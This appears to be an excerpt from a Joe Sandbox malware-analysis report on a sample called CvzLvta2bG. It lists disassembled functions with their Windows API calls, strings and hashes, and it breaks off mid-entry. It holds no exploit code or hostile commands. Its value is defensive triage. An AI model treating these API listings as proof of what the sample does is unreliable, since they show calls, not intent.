Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: b488bebfbb111d7018eca14517fc75ebf16056d50408d6054bd0a87d11416983
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: 1C71E576A00726ABEB14AE78EC41B5AB7E8AF04724F145229F554F72C1E770EE448790

Function 00E62527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E62542
GetMenuItemInfoW.USER32(00EC5890,000000FF,00000000,00000030), ref: 00E625A3
SetMenuItemInfoW.USER32(00EC5890,00000004,00000000,00000030), ref: 00E625D9
Sleep.KERNEL32(000001F4), ref: 00E625EB
GetMenuItemCount.USER32(?), ref: 00E6262F
GetMenuItemID.USER32(?,00000000), ref: 00E6264B
GetMenuItemID.USER32(?,-00000001), ref: 00E62675
GetMenuItemID.USER32(?,?), ref: 00E626BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E62700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E62714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E62735

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 222878f37b21c8195c6a6b653bbe93b9c098053734e6c1e8067daf6211ba32a7
Instruction ID: 1c57bcf63d1382f1732a6006876357f79646624a9d7419ad8e563b66e7d77876
Opcode Fuzzy Hash: 222878f37b21c8195c6a6b653bbe93b9c098053734e6c1e8067daf6211ba32a7
Instruction Fuzzy Hash: 7161A3B0940A49AFDB11CFA4EC84DFE7BB8EB01388F14516DEA42B7291D731AD05DB21

Function 00E86F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E86FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E86FA8
GetWindowLongW.USER32(?,000000F0), ref: 00E86FCC
_memset.LIBCMT ref: 00E86FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E86FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E87067

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 7145c77c3167b3b7b7e20358bd0a1c692662680fe33aab7a6d7b4ff02139b1d2
Instruction ID: d187e2eb85db1b00e7f292d16a4b075f0a9c5adc5beaee0cec79aca1c6549d5a
Opcode Fuzzy Hash: 7145c77c3167b3b7b7e20358bd0a1c692662680fe33aab7a6d7b4ff02139b1d2
Instruction Fuzzy Hash: 9C617D71900208AFDB10DFA4CD85EEE77F8EB09714F24116AFA18BB2A1C771AD45DB90

Function 00E56B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E56BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00E56C18
VariantInit.OLEAUT32(?), ref: 00E56C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00E56C4A
VariantCopy.OLEAUT32(?,?), ref: 00E56C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00E56CB1
VariantClear.OLEAUT32(?), ref: 00E56CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00E56CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E56CDC
VariantClear.OLEAUT32(?), ref: 00E56CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E56CF9

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 6b2b851462f17b2f3d614f24a0cf025dfa17ecbf62ff89223fc07a7d1a4268cb
Instruction ID: 792cdebcf246f8b85fc771d762164040473971cca850dc8f62b8ea86bbcdeabd
Opcode Fuzzy Hash: 6b2b851462f17b2f3d614f24a0cf025dfa17ecbf62ff89223fc07a7d1a4268cb
Instruction Fuzzy Hash: F2415F71A002199FCF04DFA9D8449AEBBB9EF08355F408469E955F7261CB30A949CFA0

Function 00E75732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00E75793
inet_addr.WSOCK32(?,?,?), ref: 00E757D8
gethostbyname.WSOCK32(?), ref: 00E757E4
IcmpCreateFile.IPHLPAPI ref: 00E757F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E75862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00E75878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00E758ED
WSACleanup.WSOCK32 ref: 00E758F3

Strings

Ping, xrefs: 00E75816

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: a4fc3afa92d40ae6734a5624b2f7316a99778197f3cb4049cafdbcb03d6dfdf4
Instruction ID: 1089142df7f488e525e29ff92442acce0600d8f5cb9f945de18c2b2de80e6618
Opcode Fuzzy Hash: a4fc3afa92d40ae6734a5624b2f7316a99778197f3cb4049cafdbcb03d6dfdf4
Instruction Fuzzy Hash: 36518F326007009FE7149F65DC45B6AB7E4AF48714F149929F95AFB2A1DB70E844CF42

Function 00E6B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00E6B4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00E6B546
GetLastError.KERNEL32 ref: 00E6B550
SetErrorMode.KERNEL32(00000000,READY), ref: 00E6B5BD

Strings

READY, xrefs: 00E6B596
UNKNOWN, xrefs: 00E6B575
INVALID, xrefs: 00E6B58F
NOTREADY, xrefs: 00E6B57C
READONLY, xrefs: 00E6B588

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 5ad6d92b4e9eb964a7a6491d6d5cb86931f6ea819289a3a2152426fc0dbef4e7
Instruction ID: 528e94319c08bf2db6603cccd733e6961e3becc0a264ce5dfeceb102a35a48cb
Opcode Fuzzy Hash: 5ad6d92b4e9eb964a7a6491d6d5cb86931f6ea819289a3a2152426fc0dbef4e7
Instruction Fuzzy Hash: E8319035A80209EFCB00EF68E885EEE7BB5FF49354F105125E506F7292DB709A85CB91

Function 00E58F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22

Part of subcall function 00E5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00E59014
GetDlgCtrlID.USER32 ref: 00E5901F
GetParent.USER32 ref: 00E5903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 00E5903E
GetDlgCtrlID.USER32(?), ref: 00E59047
GetParent.USER32(?), ref: 00E59063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00E59066

Strings

ListBox, xrefs: 00E58FD1
ComboBox, xrefs: 00E58F9C

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: bea5c404062d15e8d3d44d788774d4431938ddc5bf46a48892628452e0680d28
Instruction ID: 045225d101d20a757c681f6d19597e8b8116d2f95aad3a0da00e3239e0d5288b
Opcode Fuzzy Hash: bea5c404062d15e8d3d44d788774d4431938ddc5bf46a48892628452e0680d28
Instruction Fuzzy Hash: 3C21A370A00208BFDF04ABA1CC85EFEB7A5EF45310F101615F961772E2DB755859DB20

Function 00E5907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22

Part of subcall function 00E5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00E5AABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00E590FD
GetDlgCtrlID.USER32 ref: 00E59108
GetParent.USER32 ref: 00E59124
SendMessageW.USER32(00000000,?,00000111,?), ref: 00E59127
GetDlgCtrlID.USER32(?), ref: 00E59130
GetParent.USER32(?), ref: 00E5914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 00E5914F

Strings

ListBox, xrefs: 00E590BC
ComboBox, xrefs: 00E59087

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 7eb4afab97e9932568971277b1c6618d5567c06088eb9d9a42e9d22392bea274
Instruction ID: bbdeab1d18f85a1e3a7be925ae433ee6aa540b9fe2d1e65f50841625c9e3dd2d
Opcode Fuzzy Hash: 7eb4afab97e9932568971277b1c6618d5567c06088eb9d9a42e9d22392bea274
Instruction Fuzzy Hash: B121D374A00208BFDF10ABA1CC85EFEBBB8EF45300F101525F955B72A2EB755859DB20

Function 00E59163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00E5916F
GetClassNameW.USER32(00000000,?,00000100), ref: 00E59184
_wcscmp.LIBCMT ref: 00E59196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E59211

Strings

details, xrefs: 00E591BF
SHELLDLL_DefView, xrefs: 00E59190
list, xrefs: 00E591F3
smallicons, xrefs: 00E591D9
largeicons, xrefs: 00E591A5

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: da96cb92e32a23f7dfafe08b06d6761bcedda74158f82dcf9cca8c84bb7d4834
Instruction ID: bf164ad2ece15da6e4768212839a70959837af31654f762ba0f80e5dbe38d8c5
Opcode Fuzzy Hash: da96cb92e32a23f7dfafe08b06d6761bcedda74158f82dcf9cca8c84bb7d4834
Instruction Fuzzy Hash: D711593A288317FAFA112624FC0ADE737DCDB50321F212426FE04F14E3FE6168596A94

Function 00E67990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00E67A6C

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: b7ce620e847abc0fb17d44143403cf3657994db303fa354fbcbbb70a1cf5be4a
Instruction ID: ff9546e76bde6a6d96b9b2a271846fb25e374e33302d4093fb039fcf00199fd4
Opcode Fuzzy Hash: b7ce620e847abc0fb17d44143403cf3657994db303fa354fbcbbb70a1cf5be4a
Instruction Fuzzy Hash: B0B1BF7194821A9FDB00DFA4E884BBEB7F4FF09369F205429E991F7291D734A941CB90

Function 00E611CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00E611F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00E60268,?,00000001), ref: 00E61204
GetWindowThreadProcessId.USER32(00000000), ref: 00E6120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E60268,?,00000001), ref: 00E6121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00E6122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E60268,?,00000001), ref: 00E61245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00E60268,?,00000001), ref: 00E61257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00E60268,?,00000001), ref: 00E6129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00E60268,?,00000001), ref: 00E612B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00E60268,?,00000001), ref: 00E612BC

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 2dc386e484973882847dec2259628060c36e802cf48b995c29f2765aa846e5c4
Instruction ID: acb9884e4c62fbe0cdfd754e18d8a8a991bfaf50ee0df3c9ed37f7c575316477
Opcode Fuzzy Hash: 2dc386e484973882847dec2259628060c36e802cf48b995c29f2765aa846e5c4
Instruction Fuzzy Hash: C131EE75640208AFDF118F52FC48F6A37ACAF54399F1442A9F814F61B0E7759D48AB90

Function 00E0FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E0FAA6
OleUninitialize.OLE32(?,00000000), ref: 00E0FB45
UnregisterHotKey.USER32(?), ref: 00E0FC9C
DestroyWindow.USER32(?), ref: 00E445D6
FreeLibrary.KERNEL32(?), ref: 00E4463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00E44668

Strings

close all, xrefs: 00E0FAA1

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 5ff60059f5036c89499c8f72669705daee976798302699d3289e549515e24aaa
Instruction ID: 7ec4ce5685cf0773cd352ce5db04adb68948df80566150c9e72c544eabbf4ce5
Opcode Fuzzy Hash: 5ff60059f5036c89499c8f72669705daee976798302699d3289e549515e24aaa
Instruction Fuzzy Hash: 81A18E71301212CFDB29EF14D595B69F3A4BF05704F5562ADE80ABB2A2CB30AC56CF94

Function 00E79113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E79167
VariantInit.OLEAUT32(?), ref: 00E79238
VariantInit.OLEAUT32(?), ref: 00E79339
VariantClear.OLEAUT32(?), ref: 00E79343
VariantClear.OLEAUT32(?), ref: 00E793A0

Strings

Null Object assignment in FOR..IN loop, xrefs: 00E791C8, 00E792F6, 00E793AE
Incorrect Object type in FOR..IN loop, xrefs: 00E7931C
,,, xrefs: 00E791E5

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: ,,$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-218231672
Opcode ID: b70264b42dcdcc0b8e1e5d29ca821674c767a6684deaa1a15b659013771c3c8b
Instruction ID: cccc6ec56759cdf3fceed6bd7e1b219079aa13a4cd6fd4ac0103593da91c84e8
Opcode Fuzzy Hash: b70264b42dcdcc0b8e1e5d29ca821674c767a6684deaa1a15b659013771c3c8b
Instruction Fuzzy Hash: 7F91AD70A00219BBDF24DFA5D848FAEB7B8EF85714F109119F519BB292D7709904CBA0

Function 00E5A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00E5A439), ref: 00E5A377

Strings

CLASS, xrefs: 00E5A0F6
NAME, xrefs: 00E5A1A9
CLASSNN, xrefs: 00E5A119
TEXT, xrefs: 00E5A2AE
INSTANCE, xrefs: 00E5A285
REGEXPCLASS, xrefs: 00E5A13C

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 1b5bc7d76956bb8205184e511dc5ed403ce78244d6b776986d81bc790f1b85fd
Instruction ID: 783680ffb4ce7167a3bf8cf88d2b1bd555b8570b48a9c7a746b6f151e684002f
Opcode Fuzzy Hash: 1b5bc7d76956bb8205184e511dc5ed403ce78244d6b776986d81bc790f1b85fd
Instruction Fuzzy Hash: B791E770500605AACB08DFA0C482BEEFBB4BF44305F58A639EC99B7191DF31699DCB91

Function 00E02E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00E02EAE

Part of subcall function 00E01DB3: GetClientRect.USER32(?,?), ref: 00E01DDC
Part of subcall function 00E01DB3: GetWindowRect.USER32(?,?), ref: 00E01E1D
Part of subcall function 00E01DB3: ScreenToClient.USER32(?,?), ref: 00E01E45

GetDC.USER32 ref: 00E3CD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00E3CD45
SelectObject.GDI32(00000000,00000000), ref: 00E3CD53
SelectObject.GDI32(00000000,00000000), ref: 00E3CD68
ReleaseDC.USER32(?,00000000), ref: 00E3CD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00E3CDFB

Strings

U, xrefs: 00E3CCD0

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354576062.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354603796.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_CvzLvta2bG.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: cbc90700ea0e131f845e429059277ce6b28eefb93db601edf7b50a5b0e6a75a6
Instruction ID: 501ef4b73a50fa42152016035f9954cc85a071627295e09b9cf067e9ab5398a8
Opcode Fuzzy Hash: cbc90700ea0e131f845e429059277ce6b28eefb93db601edf7b50a5b0e6a75a6
Instruction Fuzzy Hash: B6718E31500205DFCF259F64C888AEA7FB5FF48318F24626AFD597A2A6D731D882DB50

Function 00E71A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E71A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00E71A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00E71ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00E71AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E71AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00E71B10
InternetCloseHandle.WININET(00000000), ref: 00E71B57

Part of subcall function 00E72483: GetLastError.KERNEL32(?,?,00E71817,00000000,00000000,00000001), ref: 00E72498
Part of subcall function 00E72483: SetEvent.KERNEL32(?,?,00E71817,00000000,00000000,00000001), ref: 00E724AD

Strings

, xrefs: 00E71B01

Memory Dump Source

Source File: 00000000.00000002.2354451881.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.2354428760.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2354514572.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
